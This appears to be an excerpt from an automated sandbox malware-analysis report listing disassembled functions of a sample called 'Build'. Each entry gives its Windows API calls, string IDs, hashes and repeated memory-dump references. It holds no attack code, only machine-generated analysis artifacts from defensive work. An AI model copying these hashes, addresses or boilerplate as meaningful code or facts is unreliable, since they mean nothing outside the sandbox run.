                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                                                                                                                                • String ID: %u.%03u
                                                                                                                                                                                • API String ID: 2956649372-1114938957
                                                                                                                                                                                • Opcode ID: 21cf22e2f86a1acc3d146f53f02603c631f6843fef879b3011e54278d68b6e2f
                                                                                                                                                                                • Instruction ID: 72884c092d42fa22d1872e7dcb9ff5b8d6f0021070a951c1afdb91779569a8d7
                                                                                                                                                                                • Opcode Fuzzy Hash: 21cf22e2f86a1acc3d146f53f02603c631f6843fef879b3011e54278d68b6e2f
                                                                                                                                                                                • Instruction Fuzzy Hash: 86214172A053409FC664EF69CC86EAFB7ECEB84740F44499DF549D3352DA34DA0887A2
                                                                                                                                                                                APIs
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CBEE
                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B5CC05
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B5CC19
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5CC2A
                                                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5CC42
                                                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 00B5CC66
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B5CC85
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                                                                                                                                • String ID: %s %s
                                                                                                                                                                                • API String ID: 385609497-2939940506
                                                                                                                                                                                • Opcode ID: 6547204d4d7ccdf2e61da2549d14a68e306954158e98f52268dfe27f0c6dd74d
                                                                                                                                                                                • Instruction ID: c4e5b99cdb287bf795e7397c6d764a6b32ae1b5eab946ccfe4519cac7f2a22b1
                                                                                                                                                                                • Opcode Fuzzy Hash: 6547204d4d7ccdf2e61da2549d14a68e306954158e98f52268dfe27f0c6dd74d
                                                                                                                                                                                • Instruction Fuzzy Hash: C2210CB290024CABDB11DFA5DD49EEE77FCEB49304F104566FA19D7012EA309A45CB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00B4CEA9,00B4CEAB,00000000,00000000,CEEE5757,00000001,00000000,00000000,?,00B4CD87,?,00000004,00B4CEA9,ROOT\CIMV2), ref: 00B623E9
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00B4CEA9,?,00000000,00000000,?,?,00B4CD87,?,00000004,00B4CEA9), ref: 00B62464
                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00B6246F
                                                                                                                                                                                • _com_issue_error.COMSUPP ref: 00B62498
                                                                                                                                                                                • _com_issue_error.COMSUPP ref: 00B624A2
                                                                                                                                                                                • GetLastError.KERNEL32(80070057,CEEE5757,00000001,00000000,00000000,?,00B4CD87,?,00000004,00B4CEA9,ROOT\CIMV2), ref: 00B624A7
                                                                                                                                                                                • _com_issue_error.COMSUPP ref: 00B624BA
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00B4CD87,?,00000004,00B4CEA9,ROOT\CIMV2), ref: 00B624D0
                                                                                                                                                                                • _com_issue_error.COMSUPP ref: 00B624E3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1353541977-0
                                                                                                                                                                                • Opcode ID: 2422e86657bce6f1d4ee1b7a7cd967ed1b00131ec07b6d5ea030048161c8901c
                                                                                                                                                                                • Instruction ID: 940003d74d630760a27fe0b24286d3eb66a95e424b193923af664ff7706061bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 2422e86657bce6f1d4ee1b7a7cd967ed1b00131ec07b6d5ea030048161c8901c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3441EA71A00705AFEB149F64DC45BAEBBE8FB48710F1082A9F609E7351DB3D9840C7A5
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClearH_prolog3Variant
                                                                                                                                                                                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                                                • API String ID: 3629354427-3505469590
                                                                                                                                                                                • Opcode ID: 8662a4135dc4df068a8e53e43008ff9da92761e62988d3f700b8ab2706337539
                                                                                                                                                                                • Instruction ID: 2b556780f8c1bef13e061823922c6b691aa1b9a67143895d0716b99d8403161a
                                                                                                                                                                                • Opcode Fuzzy Hash: 8662a4135dc4df068a8e53e43008ff9da92761e62988d3f700b8ab2706337539
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A718C30A01619AFDB54DFA4CC94DBEBBF9FF48710B0041A9F516A72A0CB34AE05DB60
                                                                                                                                                                                APIs
                                                                                                                                                                                • __aulldiv.LIBCMT ref: 00B5331D
                                                                                                                                                                                  • Part of subcall function 00B4D076: GetVersionExW.KERNEL32(?), ref: 00B4D0A7
                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B53340
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B53352
                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B53363
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53373
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B53383
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B533BE
                                                                                                                                                                                • __aullrem.LIBCMT ref: 00B53464
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1247370737-0
                                                                                                                                                                                • Opcode ID: a6c306b2f9fbd0346766bb8beec634883e18edc764a56596e803124427bb5abd
                                                                                                                                                                                • Instruction ID: 5be34ece0bf6ee46cd8f8dd49ec38126220a8ecf57272d0b920688bf468028e3
                                                                                                                                                                                • Opcode Fuzzy Hash: a6c306b2f9fbd0346766bb8beec634883e18edc764a56596e803124427bb5abd
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D5138B15083059FC710DF65C88496BB7E9FF88755F40892EF99AD3210EB34E948CB52
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                                                • API String ID: 176396367-3568243669
                                                                                                                                                                                • Opcode ID: 436b912368728112b3605acf7119a8416916a4a6d07f65ed8cfed3ca0fe8b5a4
                                                                                                                                                                                • Instruction ID: d6b6485d05aa8fac836f5a17022cfed80c6423d688d80c09c957afbc88196564
                                                                                                                                                                                • Opcode Fuzzy Hash: 436b912368728112b3605acf7119a8416916a4a6d07f65ed8cfed3ca0fe8b5a4
                                                                                                                                                                                • Instruction Fuzzy Hash: E751186764035766DB346F199812F7663F0DFA0792F6808FAFDC09B1C0FBA58C898261
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B72452,00000000,00000000,00000000,00000000,00000000,00B67A3D), ref: 00B71D1F
                                                                                                                                                                                • __fassign.LIBCMT ref: 00B71D9A
                                                                                                                                                                                • __fassign.LIBCMT ref: 00B71DB5
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B71DDB
                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,00B72452,00000000,?,?,?,?,?,?,?,?,?,00B72452,00000000), ref: 00B71DFA
                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000001,00B72452,00000000,?,?,?,?,?,?,?,?,?,00B72452,00000000), ref: 00B71E33
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                • Opcode ID: 82a759d21a593a8bdf8fd3359f96fe18183b18bb66e7b11d7ed2aa6453c93d64
                                                                                                                                                                                • Instruction ID: c27632fb8c8c5e8ad6a8995026534255bec505f92a7dde87d370656e09f05859
                                                                                                                                                                                • Opcode Fuzzy Hash: 82a759d21a593a8bdf8fd3359f96fe18183b18bb66e7b11d7ed2aa6453c93d64
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C516371A002459FDB14CFACD885AEEBBF8FF09300F14895AE969E7251D7309941CB70
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B4AD2B
                                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B4AD4A
                                                                                                                                                                                  • Part of subcall function 00B4E208: _wcslen.LIBCMT ref: 00B4E210
                                                                                                                                                                                  • Part of subcall function 00B54168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00B4E084,00000000,.exe,?,?,00000800,?,?,?,00B5AD5D), ref: 00B5417E
                                                                                                                                                                                • _swprintf.LIBCMT ref: 00B4ADEC
                                                                                                                                                                                  • Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13
                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00B4AE5E
                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00B4AE9E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                • String ID: rtmp%d
                                                                                                                                                                                • API String ID: 2133196417-3303766350
                                                                                                                                                                                • Opcode ID: 2e6a79ed255b6e77f6eccb3b04558cf0ac2138a87f71d4a748c6df0478f52cd8
                                                                                                                                                                                • Instruction ID: c051fe1dc485d35e1d1e7fa3e30050e1562f8b8d0d00312c09906e2eb8a8d22f
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e6a79ed255b6e77f6eccb3b04558cf0ac2138a87f71d4a748c6df0478f52cd8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C5150719406586ACB20EB608C85EEF77FCEF04341F1408E9B566E3141EB34DB84AF61
                                                                                                                                                                                APIs
                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00B5BE8A
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00B5BED1
                                                                                                                                                                                • ShowWindow.USER32(?,00000005,00000000), ref: 00B5BF6C
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00B5BF74
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00B5BF8A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Show$RectText
                                                                                                                                                                                • String ID: RarHtmlClassName
                                                                                                                                                                                • API String ID: 3937224194-1658105358
                                                                                                                                                                                • Opcode ID: b3fd07413f3cbc037c798eede0f0e89ebc1c63fbd5ae8e596a8250da8f43320d
                                                                                                                                                                                • Instruction ID: 0f760a94a5bffdeb50d84a5d2ccd995e704e0b97d3408005014b5061f5e61daa
                                                                                                                                                                                • Opcode Fuzzy Hash: b3fd07413f3cbc037c798eede0f0e89ebc1c63fbd5ae8e596a8250da8f43320d
                                                                                                                                                                                • Instruction Fuzzy Hash: 29414A72548300AFCB119F649C4AFAB7BE8EB49712F154599FD49AB162DF30D808CBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcslen
                                                                                                                                                                                • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                • API String ID: 176396367-3743748572
                                                                                                                                                                                • Opcode ID: 7e583d57ad9b88179799b11601cfb4b86cfb9899ba427a82618ca65932c32e4f
                                                                                                                                                                                • Instruction ID: fc52ba657806858a68283109fbe95c64591a937c3fe05bbefa233248ad138f9f
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e583d57ad9b88179799b11601cfb4b86cfb9899ba427a82618ca65932c32e4f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C317D2264830566D634AB549C42F77B3E4FB90321F6045EEFF95972C0FF55AC4983A1
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B6EEB8: _free.LIBCMT ref: 00B6EEE1
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EF42
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?), ref: 00B6BB10
                                                                                                                                                                                  • Part of subcall function 00B6BAFA: GetLastError.KERNEL32(?,?,00B6EEE6,?,00000000,?,00000000,?,00B6EF0D,?,00000007,?,?,00B6F30A,?,?), ref: 00B6BB22
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EF4D
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EF58
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EFAC
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EFB7
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EFC2
                                                                                                                                                                                • _free.LIBCMT ref: 00B6EFCD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                                                                                                                • Instruction ID: 1910de26240b2874f289d16f222f4ad0bf0e5644384f3e1c6062e0a13f5edfee
                                                                                                                                                                                • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                                                                                                                • Instruction Fuzzy Hash: BB112972940B05AAE660FBF1CD06FCB77EDAF00700F404C55F2AEA6292DB7AE5458B50
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00B60B46,00B60AA9,00B60D4A), ref: 00B60AE2
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B60AF8
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B60B0D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                • API String ID: 667068680-1718035505
                                                                                                                                                                                • Opcode ID: 250785164882b3ccbd139a3e6d5637bfc8eb267d9153c496b24359c64ca9f102
